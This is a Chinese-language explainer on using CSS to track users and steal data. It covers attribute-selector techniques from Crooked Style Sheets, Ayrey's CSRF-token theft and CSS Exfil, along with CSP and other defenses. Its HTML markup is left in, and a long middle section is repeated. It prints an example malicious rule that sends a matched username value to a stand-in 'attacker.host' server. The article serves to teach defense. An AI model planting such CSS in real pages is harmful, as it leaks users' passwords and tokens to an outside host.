CSS数据窃取技术详解与防御措施<\/h1>

1. CSS作为攻击媒介的概述<\/h2>

CSS（层叠样式表）不仅是网页展现的强大工具，近年来也被发现可用于追踪用户和窃取敏感数据。研究表明，CSS能够：<\/p>

追踪网站用户行为<\/li>
从网页中提取和窃取数据<\/li>
收集表单域中输入的数据（包括密码）<\/li>

暴露暗网用户身份<\/li> <\/ul>

2. 主要攻击技术<\/h2>

2.1 无JavaScript的用户追踪（Crooked Style Sheets）<\/h3>

Jan Böhmer的"Crooked Style Sheets"项目展示了纯CSS的追踪方案，可以：<\/p>

跟踪鼠标悬停事件<\/li>
记录链接点击行为<\/li>
监控输入字段的文本输入<\/li>

收集真实的用户代理信息（绕过虚假UA设置）<\/li> <\/ul>

2.2 CSS窃取CSRF token技术<\/h3>

Dylan Ayrey的研究展示了如何滥用CSS窃取CSRF token：<\/p>

适用条件<\/strong>：网站将CSRF token存储在HTML元素属性中<\/li>
技术原理<\/strong>：使用CSS属性选择器逐个字符猜解token<\/li>

特点<\/strong>：

攻击耗时约10秒<\/li>
不需要iframe<\/li>
不需要持续流量的远程服务器<\/li> <\/ul> <\/li> <\/ul>
2.3 CSS属性选择器的高级利用（CSS Exfil）<\/h3>
Mike Gualtieri扩展了该技术，使其能够：<\/p>

窃取表单域中的敏感数据（包括密码）<\/li>
猜解HTML标签内的任何敏感内容<\/li> <\/ul>
3. 技术实现细节<\/h2>
3.1 CSS属性选择器类型<\/h3>
攻击主要利用以下CSS属性选择器：<\/p>

选择器类型<\/th> 示例<\/th> 功能描述<\/th> <\/tr> <\/thead>

[attribute=value]<\/code><\/td> [foo="bar"]<\/code><\/td> 精确匹配属性值<\/td> <\/tr>
[attribute~=value]<\/code><\/td> [foo~="bar"]<\/code><\/td> 匹配包含指定单词的属性值<\/td> <\/tr>
[attribute|=value]<\/code><\/td> [foo|="bar"]<\/code><\/td> 匹配以指定值开头或后跟连字符的属性值<\/td> <\/tr>
[attribute^=value]<\/code><\/td> [foo^="bar"]<\/code><\/td> 匹配以指定值开头的属性值<\/td> <\/tr>
[attribute$=value]<\/code><\/td> [foo$="bar"]<\/code><\/td> 匹配以指定值结尾的属性值<\/td> <\/tr>
[attribute*=value]<\/code><\/td> [foo*="bar"]<\/code><\/td> 匹配包含指定子串的属性值<\/td> <\/tr> <\/tbody> <\/table>
3.2 攻击实施流程<\/h3>

构造恶意CSS<\/strong>：<\/li> <\/ol>
#username[<\/span>value<\/span>=<\/span>"ZeroC00L"<\/span>]<\/span> { <\/span><\/span> background<\/span>:url("https:\/\/attacker.host\/ZeroC00L"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 服务器端监控<\/strong>：<\/li> <\/ol> 攻击者监控服务器404错误日志<\/li> 成功的匹配会触发资源请求<\/li> <\/ul> 数据重组<\/strong>：从日志中提取请求片段并重组：<\/li> <\/ol> Z # Z_Ze # ZeZer # erZero # roZeroC # oCZeroC0 # C0ZeroC00 # 00ZeroC00L # 0L _L <\/code><\/pre> 3.3 两种主要攻击方法<\/h3> Ayrey方法<\/strong>：<\/p> 一次猜测最后一个字符<\/li> 噪音较大但易于自动化<\/li> <\/ul> <\/li> Gualtieri方法（CSS Exfil）<\/strong>：<\/p> 通过多个猜测重建字符串<\/li> 速度更快但有时需要人工拼接<\/li> 限制：只能窃取初始页面加载时的HTML属性<\/li> <\/ul> <\/li> <\/ol> 4. 防御措施<\/h2> 4.1 网站开发者防护<\/h3> 实施内容安全策略（CSP）<\/strong>：<\/p> 防止从外部加载CSS代码<\/li> 限制非授权资源的加载<\/li> <\/ul> <\/li> 安全存储CSRF token<\/strong>：<\/p> 避免将token直接存储在HTML元素属性中<\/li> 使用更安全的用户验证方式<\/li> <\/ul> <\/li> <\/ol> 4.2 用户防护<\/h3> 浏览器扩展<\/strong>：<\/p> 安装专门的防护扩展（如Gualtieri开发的）<\/li> 功能：检测并重写恶意CSS代码<\/li> <\/ul> <\/li> 测试工具<\/strong>：<\/p> 使用专门网页测试CSS Exfil漏洞<\/li> <\/ul> <\/li> <\/ol> 5. 历史背景<\/h2> 该技术并非全新，早在2016年CureSec就讨论过类似概念，但近期多位研究人员的关注使其重新成为热点。<\/p> 6. 总结<\/h2> CSS作为一种看似无害的样式语言，可以被恶意利用进行数据窃取。了解这些技术有助于开发者和用户更好地保护敏感信息。关键防御点包括实施严格的CSP策略、安全存储token，以及使用专门的防护工具。<\/p>

选择器类型<\/th>	示例<\/th>	功能描述<\/th> <\/tr> <\/thead>
`[attribute=value]<\/code><\/td>`	`[foo="bar"]<\/code><\/td>`	精确匹配属性值<\/td> <\/tr>
`[attribute~=value]<\/code><\/td>`	`[foo~="bar"]<\/code><\/td>`	匹配包含指定单词的属性值<\/td> <\/tr>
`[attribute\|=value]<\/code><\/td>`	`[foo\|="bar"]<\/code><\/td>`	匹配以指定值开头或后跟连字符的属性值<\/td> <\/tr>
`[attribute^=value]<\/code><\/td>`	`[foo^="bar"]<\/code><\/td>`	匹配以指定值开头的属性值<\/td> <\/tr>
`[attribute$=value]<\/code><\/td>`	`[foo$="bar"]<\/code><\/td>`	匹配以指定值结尾的属性值<\/td> <\/tr>
`[attribute*=value]<\/code><\/td>`	`[foo*="bar"]<\/code><\/td>`	匹配包含指定子串的属性值<\/td> <\/tr> <\/tbody> <\/table> 3.2 攻击实施流程<\/h3> 构造恶意CSS<\/strong>：<\/li> <\/ol> #username[<\/span>value<\/span>=<\/span>"ZeroC00L"<\/span>]<\/span> { <\/span><\/span> background<\/span>:url("https:\/\/attacker.host\/ZeroC00L"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 服务器端监控<\/strong>：<\/li> <\/ol> 攻击者监控服务器404错误日志<\/li> 成功的匹配会触发资源请求<\/li> <\/ul> 数据重组<\/strong>：从日志中提取请求片段并重组：<\/li> <\/ol> Z # Z_Ze # ZeZer # erZero # roZeroC # oCZeroC0 # C0ZeroC00 # 00ZeroC00L # 0L _L <\/code><\/pre> 3.3 两种主要攻击方法<\/h3> Ayrey方法<\/strong>：<\/p> 一次猜测最后一个字符<\/li> 噪音较大但易于自动化<\/li> <\/ul> <\/li> Gualtieri方法（CSS Exfil）<\/strong>：<\/p> 通过多个猜测重建字符串<\/li> 速度更快但有时需要人工拼接<\/li> 限制：只能窃取初始页面加载时的HTML属性<\/li> <\/ul> <\/li> <\/ol> 4. 防御措施<\/h2> 4.1 网站开发者防护<\/h3> 实施内容安全策略（CSP）<\/strong>：<\/p> 防止从外部加载CSS代码<\/li> 限制非授权资源的加载<\/li> <\/ul> <\/li> 安全存储CSRF token<\/strong>：<\/p> 避免将token直接存储在HTML元素属性中<\/li> 使用更安全的用户验证方式<\/li> <\/ul> <\/li> <\/ol> 4.2 用户防护<\/h3> 浏览器扩展<\/strong>：<\/p> 安装专门的防护扩展（如Gualtieri开发的）<\/li> 功能：检测并重写恶意CSS代码<\/li> <\/ul> <\/li> 测试工具<\/strong>：<\/p> 使用专门网页测试CSS Exfil漏洞<\/li> <\/ul> <\/li> <\/ol> 5. 历史背景<\/h2> 该技术并非全新，早在2016年CureSec就讨论过类似概念，但近期多位研究人员的关注使其重新成为热点。<\/p> 6. 总结<\/h2> CSS作为一种看似无害的样式语言，可以被恶意利用进行数据窃取。了解这些技术有助于开发者和用户更好地保护敏感信息。关键防御点包括实施严格的CSP策略、安全存储token，以及使用专门的防护工具。<\/p>